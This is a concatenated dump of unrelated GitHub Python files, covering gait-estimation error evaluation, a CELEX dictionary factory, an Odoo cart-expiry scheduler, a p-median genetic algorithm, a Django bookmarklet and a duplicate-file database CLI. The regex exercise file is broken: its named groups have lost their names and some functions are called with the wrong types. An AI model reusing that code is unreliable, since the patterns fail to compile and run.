start_idx = 200\n\n\n for i, vicon_filename in enumerate(vicon_filenames):\n\n df = pd.read_csv(vicon_filename)\n # print(df.head())\n\n dt = df['dt'].to_numpy()\n phase_ground_truth = df['phase_ground_truth'].to_numpy().reshape(-1,1)\n speed_ground_truth = df['speed_ground_truth'].to_numpy().reshape(-1,1)\n incline_ground_truth = df['incline_ground_truth'].to_numpy().reshape(-1,1)\n stairs_ground_truth = df['stairs_ground_truth'].to_numpy().reshape(-1,1)\n\n phase_hardware = df['phase_hardware'].to_numpy().reshape(-1,1)\n speed_hardware = df['speed_hardware'].to_numpy().reshape(-1,1)\n incline_hardware = df['incline_hardware'].to_numpy().reshape(-1,1)\n stairs_hardware = df['stairs_hardware'].to_numpy().reshape(-1,1)\n\n is_steady_state = df['is_steady_state_ground_truth'].to_numpy().reshape(-1,1)\n phase_events = df['phase_events_ground_truth'].to_numpy().reshape(-1,1)\n\n predictions = np.hstack((phase_hardware, speed_hardware, incline_hardware, stairs_hardware))\n true_labels = np.hstack((phase_ground_truth, speed_ground_truth, incline_ground_truth, stairs_ground_truth))\n\n #only consider the predictions starting from start_idx\n predictions = predictions[start_idx:,:]\n true_labels = true_labels[start_idx:,:]\n is_steady_state = is_steady_state[start_idx:,:]\n\n #reshape phase events to be 1D so np.nonzeros returns a 1D array\n phase_events = phase_events[start_idx:,:].reshape(-1)\n\n \n #extract raw full data from exoboot\n data = np.loadtxt(filenames[i], delimiter=',')\n data = data[start_idx:,:]\n time_exo = data[:,0]\n dts_exo = np.diff(time_exo)\n dts_exo = np.insert(dts_exo,0,dts_exo[0])\n\n #SET UP SUBJECT LEG LENGTH\n SUBJECT_LEG_LENGTH = 0.935 #AB01\n torque_profile_path = '../../torque_profile/torque_profile_coeffs.csv'\n gait_model_covar_path = '../../old_ekf_funcs/covar_fourier_normalizedsL_linearsL.csv'\n gait_model_path = '../../old_ekf_funcs/gaitModel_fourier_normalizedsL_linearsL.csv'\n\n\n\n \n phase_event_idxs = np.nonzero(phase_events == 1)\n #insert idxs for beginning and end of trial\n phase_event_idxs = np.insert(phase_event_idxs,0,0)\n phase_event_idxs = np.append(phase_event_idxs,len(phase_events)-1)\n\n #extract number of phase events\n num_phase_events = len(phase_event_idxs)\n # print(num_phase_events)\n # print(phase_event_idxs)\n # input()\n\n #extract only the data that is moving for TBE\n tbe_mask = speed_ground_truth[start_idx:,:].reshape(-1) >= 0.05\n tbe_idxs = np.argwhere(tbe_mask)\n # print(tbe_idxs)\n # print(len(tbe_idxs))\n # print(tbe_idxs[0], tbe_idxs[-1])\n data_tbe = data[tbe_mask,:]\n #overwrite the time vector of the data at position zero\n dts_exo_tbe = dts_exo[tbe_mask]\n time_exo_tbe = np.cumsum(dts_exo_tbe)\n data_tbe[:,0] = time_exo_tbe\n true_labels_tbe = true_labels[tbe_mask,:]\n is_steady_state_tbe = is_steady_state[tbe_mask,:]\n\n #remove the phase events that aren't in the range of the TBE data\n phase_events_tbe = phase_events[tbe_mask]\n phase_event_idxs_tbe = np.nonzero(phase_events_tbe == 1)[0]\n\n #extract number of phase events for tbe\n num_phase_events_tbe = len(phase_event_idxs_tbe)\n\n # print(phase_event_idxs_tbe)\n\n #extract data that isn't stairs and is moving for old EKF\n ekf_mask = np.logical_and( (np.abs(stairs_ground_truth[start_idx:,:].reshape(-1)) <= 0.5), (speed_ground_truth[start_idx:,:].reshape(-1) >= 0.05)) \n ekf_idxs = np.argwhere(ekf_mask)\n # print(ekf_idxs)\n # print(len(ekf_idxs))\n # print(ekf_idxs[0], ekf_idxs[-1])\n data_ekf = data[ekf_mask,:]\n #overwrite the time vector of the data at position zero\n dts_exo_ekf = dts_exo[ekf_mask]\n time_exo_ekf = np.cumsum(dts_exo_ekf)\n data_ekf[:,0] = time_exo_ekf\n true_labels_ekf = true_labels[ekf_mask,:]\n is_steady_state_ekf = is_steady_state[ekf_mask,:]\n\n #remove the phase events that aren't in the range of the EKF data\n phase_events_ekf = phase_events[ekf_mask]\n phase_event_idxs_ekf = np.nonzero(phase_events_ekf == 1)[0]\n # print(phase_event_idxs_ekf)\n #extract number of phase events for tbe\n num_phase_events_ekf = len(phase_event_idxs_ekf)\n\n # input()\n\n phase_sim_ekf, speed_sim_ekf, incline_sim_ekf, _ = sim_other_models(data_ekf, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=not True)\n _, _, _, phase_sim_tbe = sim_other_models(data_tbe, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=not True)\n\n if not True:\n fig, axs = plt.subplots(3,1)\n axs[0].plot(phase_sim_ekf,'r',label='EKF')\n axs[0].plot(true_labels_ekf[:,0],'b',label='ground truth')\n axs[0].plot(phase_events_ekf,'k',label='phase_events_ekf')\n axs[0].legend()\n axs[1].plot(speed_sim_ekf,'r')\n axs[1].plot(true_labels_ekf[:,1],'b')\n\n axs[2].plot(incline_sim_ekf,'r')\n axs[2].plot(true_labels_ekf[:,2],'b')\n\n fig, axs = plt.subplots()\n axs.plot(phase_sim_tbe,'r',label='TBE')\n axs.plot(true_labels_tbe[:,0],'b',label='ground truth')\n axs.plot(phase_events_tbe,'k',label='phase_events_tbe')\n axs.legend()\n\n plt.show()\n\n # print(len(speed_sim_ekf))\n #run through ekf data\n for i in range(num_phase_events_ekf-1):\n current_idx = phase_event_idxs_ekf[i]\n next_idx = phase_event_idxs_ekf[i+1]\n\n # print(f'current_idx: {current_idx}')\n # print(f'next_idx: {next_idx}')\n\n phase_sim_ekf_step = phase_sim_ekf[current_idx:next_idx,:].reshape(-1)\n speed_sim_ekf_step = speed_sim_ekf[current_idx:next_idx,:].reshape(-1)\n incline_sim_ekf_step = incline_sim_ekf[current_idx:next_idx,:].reshape(-1)\n\n true_labels_step = true_labels_ekf[current_idx:next_idx,:]\n\n # determine if we're steady state\n is_steady_state_ekf_step = is_steady_state_ekf[current_idx:next_idx].flatten()\n is_steady_state_ekf_step_bool = np.average(is_steady_state_ekf_step) >= 0.5\n # print(is_steady_state_ekf_step.shape)\n # print(is_steady_state_ekf_step)\n # print(is_steady_state_ekf_step_bool)\n\n\n # input()\n\n if not True:\n fig, axs = plt.subplots(3,1)\n axs[0].plot(phase_sim_ekf_step,'r',label='EKF')\n axs[0].plot(true_labels_step[:,0],'b',label='ground truth')\n axs[0].legend()\n axs[1].plot(speed_sim_ekf_step,'r')\n axs[1].plot(true_labels_step[:,1],'b')\n\n axs[2].plot(incline_sim_ekf_step,'r')\n axs[2].plot(true_labels_step[:,2],'b')\n \n # plt.show()\n\n phase_rmse_step = np.sqrt(np.mean(phase_dist(phase_sim_ekf_step, true_labels_step[:,0])**2))\n speed_rmse_step = np.sqrt(np.mean((speed_sim_ekf_step - true_labels_step[:,1])**2))\n incline_rmse_step = np.sqrt(np.mean((incline_sim_ekf_step - true_labels_step[:,2])**2))\n\n\n #update RMSE overall vector\n phase_rmses_ekf.append(phase_rmse_step)\n speed_rmses_ekf.append(speed_rmse_step)\n incline_rmses_ekf.append(incline_rmse_step)\n\n # handle steady state/transitory specific errors\n if is_steady_state_ekf_step_bool:\n phase_rmses_ekf_ss.append(phase_rmse_step)\n speed_rmses_ekf_ss.append(speed_rmse_step)\n incline_rmses_ekf_ss.append(incline_rmse_step)\n\n else:\n phase_rmses_ekf_nss.append(phase_rmse_step)\n speed_rmses_ekf_nss.append(speed_rmse_step)\n incline_rmses_ekf_nss.append(incline_rmse_step)\n\n # input()\n\n #run through tbe data\n for i in range(num_phase_events_tbe-1):\n current_idx = phase_event_idxs_tbe[i]\n next_idx = phase_event_idxs_tbe[i+1]\n\n # print(f'current_idx: {current_idx}')\n # print(f'next_idx: {next_idx}')\n\n phase_sim_tbe_step = phase_sim_tbe[current_idx:next_idx,:].reshape(-1)\n true_labels_step = true_labels_tbe[current_idx:next_idx,:]\n\n # determine if we're steady state\n is_steady_state_tbe_step = is_steady_state_tbe[current_idx:next_idx].flatten()\n is_steady_state_tbe_step_bool = np.average(is_steady_state_tbe_step) >= 0.5\n\n # print(speed_sim_tbe_step)\n phase_rmse_step = np.sqrt(np.mean(phase_dist(phase_sim_tbe_step, true_labels_step[:,0])**2))\n\n #update RMSE overall vector\n phase_rmses_tbe.append(phase_rmse_step)\n\n # handle steady state/transitory specific errors\n if is_steady_state_tbe_step_bool:\n phase_rmses_tbe_ss.append(phase_rmse_step)\n\n else:\n phase_rmses_tbe_nss.append(phase_rmse_step)\n\n\n # input()\n\n\n phase_rmses_ekf = np.array(phase_rmses_ekf)\n speed_rmses_ekf = np.array(speed_rmses_ekf)\n incline_rmses_ekf = np.array(incline_rmses_ekf)\n phase_rmses_tbe = np.array(phase_rmses_tbe)\n\n phase_rmses_ekf_ss = np.array(phase_rmses_ekf_ss)\n speed_rmses_ekf_ss = np.array(speed_rmses_ekf_ss)\n incline_rmses_ekf_ss = np.array(incline_rmses_ekf_ss)\n phase_rmses_tbe_ss = np.array(phase_rmses_tbe_ss)\n\n phase_rmses_ekf_nss = np.array(phase_rmses_ekf_nss)\n speed_rmses_ekf_nss = np.array(speed_rmses_ekf_nss)\n incline_rmses_ekf_nss = np.array(incline_rmses_ekf_nss)\n phase_rmses_tbe_nss = np.array(phase_rmses_tbe_nss)\n\n print('EKF')\n print(phase_rmses_ekf)\n print('Overall')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf)} +- {np.std(phase_rmses_ekf)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf)} +- {np.std(speed_rmses_ekf)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf)} +- {np.std(incline_rmses_ekf)}')\n\n print('Steady State')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf_ss)} +- {np.std(phase_rmses_ekf_ss)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf_ss)} +- {np.std(speed_rmses_ekf_ss)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf_ss)} +- {np.std(incline_rmses_ekf_ss)}')\n\n print('Transitory')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf_nss)} +- {np.std(phase_rmses_ekf_nss)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf_nss)} +- {np.std(speed_rmses_ekf_nss)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf_nss)} +- {np.std(incline_rmses_ekf_nss)}')\n print()\n\n print('TBE')\n print('Overall')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe)} +- {np.std(phase_rmses_tbe)}')\n print('Steady State')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe_ss)} +- {np.std(phase_rmses_tbe_ss)}')\n print('Transitory')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe_nss)} +- {np.std(phase_rmses_tbe_nss)}')\n\n\n print()","repo_name":"leotolstoy/ml-gait-estimation","sub_path":"sim_other_models.py","file_name":"sim_other_models.py","file_ext":"py","file_size_in_byte":37760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3902520950","text":"'''\nCreated on Jun 2, 2014\n\n@author: dbhage\n\nFactory to create Celex objects\n'''\n\nimport os\n\nfrom celex.phonology.english_celex import EnglishCelex\nfrom celex.phonology.dutch_celex import DutchCelex\nfrom celex.phonology.german_celex import GermanCelex\n\ndef build_celex(celex_path, language, version):\n '''\n Build the Celex2 dictionary.\n Phoneme translations will always be returned as a list - See version for format.\n \n @param celex_path: Path to the celex2 directory\n @type celex_path: str\n \n @param language: 0 - English, 1 - German, 2 - Dutch\n @type language: int\n \n @param version: 0 - leading apostrophe removed, 1 - split on hyphens, 2 - all characters listed separately\n @type version: int\n \n @return: Celex object built according to parameters passed\n @rtype: Celex obj\n \n @raise ValueError: raises ValueError if celex_path parameter is invalid or language or version out of range\n '''\n check_path(celex_path)\n\n if language not in [0,1,2]:\n raise ValueError(\"Language not in range. Expected 0, 1 or 2, Found:\" + str(language))\n\n if version not in [0,1,2]:\n raise ValueError(\"Version not in range. Expected 0, 1 or 2, Found:\" + str(version))\n\n if language == 0:\n celex = EnglishCelex()\n elif language == 1:\n celex = GermanCelex()\n else:\n celex = DutchCelex()\n \n celex.build(celex_path, version)\n \n return celex\n\ndef check_path(celex_path):\n '''\n Check if the path to celex2 exists\n \n @param celex_path: the path to the celex2 root directory\n @type celex_path: str\n \n @raise ValueError: raised if celex_path does not exist\n '''\n if not os.path.exists(celex_path):\n raise ValueError(\"Celex Path \\'\" + celex_path + \"\\' does not exist.\")","repo_name":"dbhage/pycelex-phonology","sub_path":"celex/factory/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17196277682","text":"import re\nimport pandas as pd\n\n\ndef is_vowel(s):\n \"\"\"Is it a vowel?\n Args:\n s: any string\n Out:\n True if s is a vowel (bool)\n \"\"\"\n return bool(re.search(r'^[aeiou]$', s.lower()))\n\n\ndef is_valid_user(s):\n \"\"\"Is string a good username?\n Args:\n s: any string\n Out:\n True if s is lowercase letters, numbers, and _\n and < 32 chars (bool)\n \"\"\"\n return bool(re.search('^[a-z][a-z0-9_]{,31}$', s))\n\n \ndef capture_numbers(lst):\n \"\"\"Capture phone numbers\n Args:\n list o strimgs\n Out:\n list of phone numbers\n \"\"\"\n phone_regex = re.compile('''^\n (?P\\+\\d+)?\n \\D*?\n (?P\\d{3})?\n \\D*?\n (?P\\d{3})\n \\D*?\n (?P\\d{4})\n \\D*\n $''', re.VERBOSE)\n lst.str.extract(phone_regex)\n \n return re.search(r'', lst).groups()\n \nphone = ['(210) 867 5309','+1 210.867.5309','867-5309','210-867-5309']\nprint(is_valid_user(phone))\n\n\ndef change_dates(lst):\n \"\"\"Standardize dates phone numbers\n Args:\n list of dates\n Out:\n list of Y-M-D dates \n \"\"\"\n r = r'(\\d+)/(\\d+)/(\\d+)'\n return [re.sub(r, r'20\\3-\\1-\\2',date) for date in lst]\n \ndates = ['02/04/19','02/05/19','02/06/19','02/07/19']\nprint(change_dates(dates))\n\n\ndef parse_logs(logs):\n \"\"\"Extract parts of logfiles.\n Args:\n list of logfiles\n Out:\n list of lists\n \"\"\"\n r = r'''^\n (?PGET|POST)\n \\s\n (?P/[/\\w\\-\\?=]+)\n \\s\n \\[(?P.+)\\]\n \\s\n (?PHTTP/\\d+\\.\\d+)\n \\s\n \\{(?P\\d+)\\}\n \\s\n (?P\\d+)\n \\s\n \"(?P.+)\"\n \\s\n (?P\\d+\\.\\d+\\.\\d+\\.\\d+)\n $'''\n return [re.search(r, l, re.VERBOSE).groupdict() for l in logs.strip().split('\\n')]\n\nlogs = ['GET /api/v1/sales?page=86 [16/Apr/2019:193452+0000] HTTP/1.1 {200} 510348 \"python-requests/2.21.0\" 97.105.19.58',\n 'POST /users_accounts/file-upload [16/Apr/2019:193452+0000] HTTP/1.1 {201} 42 \"User-Agent: Mozilla/5.0 (X11; Fedora; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\" 97.105.19.58',\n 'GET /api/v1/items?page=3 [16/Apr/2019:193453+0000] HTTP/1.1 {429} 3561 \"python-requests/2.21.0\" 97.105.19.58']\nprint(parse_logs(logs))","repo_name":"konstanzer/data-analysis-exercises","sub_path":"nlp-exercises/regex-ex.py","file_name":"regex-ex.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40686904427","text":"from datetime import timedelta\n\nfrom odoo import _, api, fields, models\nfrom odoo.osv import expression\n\n\nclass Website(models.Model):\n _inherit = \"website\"\n\n cart_expire_delay = fields.Float(\n string=\"Expire Delay\",\n default=0.0,\n help=\"Automatically cancel website orders after the given time.\\n\"\n \"Set to 0 to disable this feature.\",\n )\n\n def _get_cart_expire_delay_domain(self):\n self.ensure_one()\n expire_date = fields.Datetime.now() - timedelta(hours=self.cart_expire_delay)\n return [\n (\"website_id\", \"=\", self.id),\n (\"state\", \"in\", [\"draft\", \"sent\"]),\n (\"write_date\", \"<=\", expire_date),\n ]\n\n @api.model\n def _scheduler_website_expire_cart(self):\n websites = self.search([(\"cart_expire_delay\", \">\", 0)])\n if not websites:\n return True\n # Get all carts to expire\n carts_to_expire_domains = [\n website._get_cart_expire_delay_domain() for website in websites\n ]\n carts_to_expire = self.env[\"sale.order\"].search(\n expression.OR(carts_to_expire_domains)\n )\n # Expire carts\n for cart in carts_to_expire:\n cart.message_post(body=_(\"Cart expired\"))\n carts_to_expire._action_cancel()\n","repo_name":"OCA/e-commerce","sub_path":"website_sale_cart_expire/models/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"31"} +{"seq_id":"35085918071","text":"from math import factorial, ceil, log\nfrom random import randint, sample\nfrom .cost import cost, parallel_cost\nimport concurrent.futures as cf\n\n\nclass Population:\n\n def __init__(self, p_value, grid, distance_mx):\n \"\"\"\n Initializes population's parameters (Alp et al. (2003), 4.3)\n Args:\n p_value: The p-value of the problem.\n grid: A list of MapBox objects.\n distance_mx: A NumPy array.\n \"\"\"\n\n self.n_supply = len(distance_mx) - len(distance_mx[0])\n self.p_value = p_value\n\n # If selecting less locations than supply points, choose among supply points.\n if self.n_supply >= p_value:\n self.n = self.n_supply\n self.solution = \"supply\"\n # If selecting more locations than (non-zero) supply points, pick all supply points and choose the rest.\n elif self.n_supply > 0:\n self.n = len(grid)\n self.p_value -= self.n_supply\n self.solution = \"mixed\"\n # Otherwise choose only demand locations\n else:\n self.n = len(grid)\n self.solution = \"demand\"\n\n self.n_choose_p = factorial(self.n) / (factorial(self.p_value) * (factorial(self.n - self.p_value)))\n self.density = ceil(self.n / self.p_value)\n self.k = max(2, (ceil((self.n / 100) * (log(self.n_choose_p) / self.density))))\n self.stop = ceil(self.n * (self.p_value ** (1 / 2)))\n self.candidates = None\n self.best = None\n self.worst = None\n self.costs = {}\n self.grid = grid\n self.distances = distance_mx\n\n def initialize(self):\n \"\"\"\n Performs initial draw of candidates (Alp et al. (2003), 4.4)\n Candidate cost, best (least expensive) and worst (most expensive) candidates are computed.\n \"\"\"\n k_groups = []\n for i in range(1, self.k + 1):\n k_group = []\n start = 0\n end = self.n\n step = i\n for j in range(i):\n k_group.extend(list(range(start, end, step)))\n start += 1\n while len(k_group) % self.p_value > 0:\n random_number = randint(0, self.n - 1)\n if random_number not in k_group[-(len(k_group) % self.p_value):]:\n k_group.append(random_number)\n k_groups.extend(k_group)\n if self.solution == \"supply\":\n offset = len(self.grid)\n k_groups = [k + offset for k in k_groups]\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n elif self.solution == \"mixed\":\n offset = len(self.grid)\n all_supply = list(range(offset, offset + self.n_supply))\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n for item in self.candidates:\n item.extend(all_supply)\n else:\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n\n self.candidates = [frozenset(c) for c in self.candidates]\n\n self.costs = {c: cost(c, self.grid, self.distances) for c in self.candidates}\n self.best = min(self.candidates, key=lambda t: self.costs[t])\n self.worst = max(self.candidates, key=lambda t: self.costs[t])\n\n def get_parents(self):\n \"\"\"\n Randomly draw two candidates from the current population. (Alp et al. (2003), 4.5)\n\n Returns: list\n \"\"\"\n return sample(self.candidates, 2)\n\n def get_child(self, parents):\n \"\"\"\n Create a child (Alp et al. (2003), 4.6)\n\n Args:\n parents: A pair of solutions (list)\n\n Returns:\n A -perhaps- new solution (frozenset)\n \"\"\"\n draft_child = set(parents[0] | parents[1])\n removable_genes = set(parents[0] ^ parents[1])\n\n p = self.p_value + self.n_supply if self.solution == \"mixed\" else self.p_value\n\n while len(draft_child) > p:\n gene_to_remove = min(removable_genes, key=lambda t: cost(draft_child - {t}, self.grid, self.distances))\n draft_child.discard(gene_to_remove)\n removable_genes.discard(gene_to_remove)\n return frozenset(draft_child)\n\n def get_children(self):\n parents = self.get_parents()\n child = self.get_child(parents)\n return child\n\n def update_candidates(self, child):\n \"\"\"\n Updates the current population as follows. If the the child's cost is larger than that of the worst's candidate,\n then the former is added to the population and the latter removed. If in addition the child's cost is the new\n best candidate/solution, the stop counter is reset. (Alp et al. (2003), 4.8 and 4.9)\n\n Args:\n child: A solution (frozenset)\n \"\"\"\n if child not in self.candidates:\n child_cost = cost(child, self.grid, self.distances)\n if child_cost < self.costs[self.worst]:\n if child_cost < self.costs[self.best]:\n self.stop = ceil(self.n * (self.p_value ** (1 / 2))) + 1\n self.candidates.remove(self.worst)\n self.candidates.append(child)\n self.costs[child] = child_cost\n self.worst = max(self.candidates, key=lambda t: self.costs[t])\n self.best = min(self.candidates, key=lambda t: self.costs[t])\n self.stop -= 1\n","repo_name":"ibadkureshi/tnk-locationallocation","sub_path":"pmedian/functions/p_median/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"75066658966","text":"\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\n\n\ndef context(request):\n site = Site.objects.get_current(),\n return {\n 'site': site[0],\n 'bookmarklet': ''.join([ \"javascript:window.location='http://\",\n site[0].domain, reverse('add'),\n \"?url='+window.location\" ])\n }\n","repo_name":"bvanslyke/bookmarksapp","sub_path":"bookmarks/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2751690442","text":"import os\nimport sys\nimport json\nimport sqlite3\nimport time\nimport shutil\nimport hashlib\nfrom pathlib import Path\n \nimport dataset\nimport colored\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\nfrom . import AppDB\n\ndef check_file(f):\n if isinstance(f, str):\n f = Path(f)\n return f.is_file() and not f.name.startswith('.') and os.path.getsize(f) > 0\n else: #already a file object\n return f.is_file() and not f.name.startswith('.') and os.path.getsize(f) > 0\n\ndef check_dir(d):\n if isinstance(d, str):\n d = Path(d)\n return d.is_dir() and not d.name.startswith('.') and not d.is_symlink() and not d.is_mount()\n else: #already a dir object\n return d.is_dir() and not d.name.startswith('.')\n\ndef close_db_command(e = None):\n \"\"\"Close the database\"\"\"\n AppDB.close_db(e)\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n AppDB.init_db()\n click.echo('Initialized the database: %s' % (g.DATABASE_PATH))\n\n@click.command('drop-db')\n@with_appcontext\ndef drop_db_command():\n \"\"\"Drop the database file, if it exists.\"\"\"\n AppDB.drop_db()\n click.echo('Deleted the database')\n\n@click.command('db-ls')\n@click.option('--files/--no-files', default=True)\n@click.option('--dirs/--no-dirs', default=False)\n@click.option('--hashes/--no-hashes', default=False)\n@with_appcontext\ndef db_ls_command(files = True, dirs = False, hashes = False):\n \"\"\"List entries in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n if files:\n for d in ds['files'].all():\n Node = AppDB.FileNode(d)\n click.echo('%s' % (Node) )\n\n if dirs:\n for d in ds['dirs'].all():\n Node = AppDB.DirNode(d['abs_path'])\n click.echo('%s' % (Node) )\n\n if hashes:\n for h in ds['files'].distinct('sha1'):\n click.echo('%s' % (h['sha1']))\n for f in ds['files'].find(sha1=h['sha1'], order_by='abs_path'):\n click.echo('\\t[%7s] . %s' % (f['status'], \n click.format_filename(f['abs_path'])) )\n\n@click.command('db-ls-files')\n@with_appcontext\ndef db_ls_files_command():\n \"\"\"List files in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n for n in ds['files'].all():\n click.echo('[%7s] %s\\n\\t%s' % (n['status'], click.format_filename(n['abs_path']), n['sha1']) )\n click.echo('\\t%s\\n' % click.format_filename(json.dumps(n)) )\n return\n\n@click.command('db-ls-dirs')\n@with_appcontext\ndef db_ls_dirs_command():\n \"\"\"List dirs in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n for n in ds['dirs'].all():\n click.echo('%s' % click.format_filename(n['abs_path']) )\n click.echo('\\t%s\\n' % click.format_filename(json.dumps(n)) )\n return\n\n\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n dir_okay=True, resolve_path=True), required=True)\n@click.command('rm')\n@with_appcontext\ndef db_rm_command(file_name, **kw):\n \"\"\" REMOVE file(s) from the database \"\"\"\n\n if file_name and os.path.isfile(file_name):\n fNode = AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique() # Checks against DB by default\n click.echo('Removing: [%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.db_delete()\n return\n\n ## FIXME: file_name could be a different directory THIS WILL IGNORE\n ## Means we passed in '.' and we'll recursively remove all files from DB\n dir_name = os.getcwd()\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue ## Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n fNode = AppDB.FileNode( os.path.join(r, f) )\n fNode.score = fNode.test_unique() # Checks against DB by default\n click.echo('Removing: [%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.db_delete()\n \n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n dir_okay=False, resolve_path=True), required=False)\n@click.command('curse')\n@with_appcontext\ndef curse_command(file_name = False, **kw):\n \"\"\" CURSE the database wih known BAD files \"\"\"\n\n if file_name:\n fNode = AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique() # Checks against DB by default\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.set_status(\"CURSED\")\n fNode.score = fNode.test_unique() # Checks against DB by default\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.db_add()\n return\n\n dir_name = os.getcwd()\n ## It is possible to store files with the same hash into the DB this way\n ## that should be ok - but worth noting that DB HASHES may not be unique\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue ## Skip directories that don't pass\n click.echo('CURSING %s' % click.format_filename(r))\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n fNode = AppDB.FileNode( os.path.join(r, f) )\n fNode.set_status(\"CURSED\") ## NOTE: Can overwrite previously BLESSED files\n fNode.db_add()\n\n click.echo('\\t[%7s] %s' % (fNode.status, fNode) )\n\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n dir_okay=True, resolve_path=True), required=False)\n@click.command('bless')\n@with_appcontext\ndef bless_command(file_name = False, **kw):\n \"\"\" Populate the database wih confirmed files \"\"\"\n\n if file_name and os.path.isfile(file_name):\n fNode = AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique()\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.set_status(\"BLESSED\")\n fNode.score = fNode.test_unique()\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n fNode.db_add()\n return\n\n if file_name:\n dir_name = file_name\n else:\n dir_name = os.getcwd()\n ## It is possible to store files with the same hash into the DB this way\n ## that should be ok - but worth noting that DB HASHES may not be unique\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue ## Skip directories that don't pass\n click.echo('Blessing %s' % click.format_filename(r))\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue\n fNode = AppDB.FileNode( os.path.join(r, f) )\n fNode.set_status(\"BLESSED\") ## NOTE: Can overwrite previously CURSED files\n fNode.db_add()\n\n click.echo('\\t[%s] %s' % (fNode.status, fNode) )\n\n## Via: https://click.palletsprojects.com/en/7.x/api/#click.Path\n@click.argument('file_name', type=click.Path(exists=True, file_okay=True, \n dir_okay=False, resolve_path=True), required=False)\n@click.option('-threshold', '-t', default=0)\n@click.option('--all/--no-all', default=False)\n@click.command('ls')\n@with_appcontext\ndef fs_ls_command(file_name = False, **kw): #, show_all_files = False):\n \"\"\"List files on the filesystem based on database.\"\"\"\n\n if file_name:\n fNode = AppDB.FileNode(file_name)\n fNode.score = fNode.test_unique()\n click.echo('[%7s] @ [%5s] %s' % (fNode.status, fNode.score, fNode) )\n return\n\n file_list = [ ]\n dir_name = os.getcwd()\n\n for r, subs, files in os.walk(dir_name):\n if not check_dir(r): continue ## Skip directories that don't pass\n\n for f in files:\n if not check_file( os.path.join(r, f) ): continue ## Skip files that don't pass\n\n fNode = AppDB.FileNode( os.path.join(r, f) )\n file_list.append(fNode)\n\n ## Running this check vs in previous loop in case we wanted to do something else\n for fNode in file_list: \n fNode.score = fNode.test_unique() # Checks against DB by default\n\n dup_scores = [n.score for n in file_list if n.score > 0] or [0]\n min_score = min(dup_scores)\n max_score = max(dup_scores)\n\n if kw['threshold'] <= 0:\n ave_score = sum(dup_scores) / len(dup_scores)\n else:\n ave_score = kw['threshold']\n\n lower_T = int(ave_score * .8) ## arbitrary\n upper_T = int(ave_score * 1.2) ## arbitrary\n\n click.echo(\"\\t[%s [%s - %s] %s]\\n\" % (min_score, lower_T, upper_T, max_score) )\n for fNode in file_list:\n\n ## NOTE: The conditionals are meant for each node to have one exclusive action\n ##\n if \"BLESSED\" in fNode.status:\n pass ## Take no actions - these nodes are already in the DB\n elif \"CURSED\" in fNode.status:\n pass ## Take no actions - these nodes are already in the DB\n #\n # We know these won't be BLESSED or CURSED because of earlier checks\n # There may still be duplicates in the list - e.g. among other filesystem matches\n #\n elif fNode.score < 0: \n fNode.set_status(\"GOOD\") # this only means unique vs DB\n\n elif fNode.score >= upper_T:\n 